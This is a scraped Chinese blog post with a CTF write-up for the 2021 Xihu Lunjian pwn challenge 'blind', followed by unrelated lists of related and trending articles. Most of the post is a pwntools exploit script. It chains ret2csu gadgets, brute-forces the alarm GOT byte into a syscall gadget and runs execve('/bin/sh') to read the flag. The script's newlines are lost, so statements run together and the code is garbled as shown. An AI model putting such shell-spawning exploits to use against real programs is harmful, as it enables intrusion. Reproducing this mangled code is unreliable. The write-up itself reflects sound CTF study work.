2021 西湖论剑 pwn blind
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。
通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0)
exp
#/usr/env/bin python
from pwn import *
import timecontext.log_level = "debug"gadget1 = 0x4007ba
gadget2 = 0x4007a0elf = ELF('./blind')
read_got = elf.got['read']
read_plt = elf.plt['read']
alarm_plt = elf.plt['alarm']
alarm_got = elf.got['alarm']
bss_addr = elf.bss()i = 1def exp(off):payload = 'a' * 0x58payload += p64(gadget1)payload += p64(0) + p64(1) + p64(read_got)payload += p64(1) + p64(alarm_got) + p64(0)payload += p64(gadget2)payload += p64(gadget1)payload += p64(0) + p64(1) + p64(read_got)payload += p64(0x3b) + p64(bss_addr) + p64(0)payload += p64(gadget2)payload += p64(gadget1)payload += p64(0) + p64(1) + p64(alarm_got)payload += p64(0) + p64(0) + p64(bss_addr)payload += p64(gadget2)payload = payload.ljust(0x500, '\x00')payload += p8(off)payload += "/bin/sh\x00" + 'a' * (0x3b - 8)#gdb.attach(r)#pause()r.send(payload)sleep(1)r.sendline("echo hello!")s = r.recv(10)print sif "hello" in s:r.sendline("ls")r.sendline("cat flag")r.interactive()else:returni = 20
while True:try:global rr = process("./blind")i += 1exp(i)print iexcept:r.close()print 'trying...'
2021 西湖论剑 pwn blind相关推荐
- 2021西湖论剑wp
web OA?RCE? ⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码 的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter $test ...
- WP-2021西湖论剑
2021西湖论剑-wp 前言 全靠大佬打,我是划水的. 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FI ...
- 2022西湖论剑-初赛CTF部分wp-Zodiac
2022西湖论剑-初赛CTF部分wp-Zodiac 文章目录 2022西湖论剑-初赛CTF部分wp-Zodiac WEB real_ez_node 扭转乾坤 Node Magical Login PW ...
- 2023西湖论剑wirteup
2023西湖论剑wirteup 文章目录 2023西湖论剑wirteup 机你太美 take_the_zip_easy mp3 Isolated Machine Memory Analysis 前言: ...
- 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代...
2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...
- 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代
2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...
- 远禾科技出席阿里ASRC生态大会 并参与安恒西湖论剑...
近日,由阿里安全响应中心举办的2019 ASRC生态大会与安恒承办的2019西湖论剑·网络安全大会在互联网之都杭州成功召开,作为网络安全行业的两大盛会,得到了协会领导.业界权威.行业大咖.领导品牌.企 ...
- 远禾科技出席阿里ASRC生态大会 并参与安恒西湖论剑
近日,由阿里安全响应中心举办的2019 ASRC生态大会与安恒承办的2019西湖论剑·网络安全大会在互联网之都杭州成功召开,作为网络安全行业的两大盛会,得到了协会领导.业界权威.行业大咖.领导品牌.企 ...
- 2023西湖论剑——misc——MP3
西湖论剑--misc--MP3 附件下载 链接:https://pan.baidu.com/s/1A-QFz3qC4Q2mSdZKBYqZNw 提取码:lulu MP3详解 这个应该是2023年这一届 ...
最新文章
- SpringBoot中的SFL4J日志
- property装饰器
- ajax如何知道超时请求,如何发送ajax请求来检查会话超时并在grails中呈现relogin消息?...
- 人脸变形算法——MLS
- “捆绑”住用户,需要优秀的产品(经验分享)
- fixed 语句(C# 参考)
- 信息学奥赛一本通(1405:质数的和与积)
- Delphi unit单元文件结构
- 最长重复子串_3. 无重复字符的最长子串
- Android APP推广流程
- Matlab并行编程
- 使用easywechat给关注公众号用户发消息
- Java导出Excel提示文件损坏_导出Gridview到Excel成功但文件已损坏?
- win7一直安装并更新计算机,win7系统更新时一直正在等待安装重启不更新的恢复方案...
- 前端开发问题及解决方案
- Mysql 5.5.8 安装手册
- 西北乱跑娃 --- python类方法重写
- 百趣代谢组学分享:从SWATH到MRM:一种新型高覆盖度靶向代谢组学技术
- Cause: java.sql.SQLException: Java heap space
- No qualifying bean of type ‘xxx‘的问题解决方案
热门文章
- 没有SOA,CIO 将面临什么
- 个人对粗糙集的一些理解和简单举例
- 磐石云服务器_磐石云双十二高防ip、海外服务器限量1元秒杀
- 汉仪尚巍手书有版权吗_汉仪尚巍手书字体下载 汉仪尚巍手书体W字体免费版下载...
- 奇偶 ASCII 值判断(信息学奥赛一本通)
- Spring 框架远程代码执行漏洞(CVE-2022-22965)
- 一篇文章带你学会 Spring 中的 JdbcTemplate 增删改查操作
- 校园二手书pro(微信小程序运营版)
- 邮件接收中Postfix、Dovecot、Squirrelmail、MySQL、AMaVis、Clam AntiVirus和SpamAssasin的功能解析
- 搜一下导航完整程序源码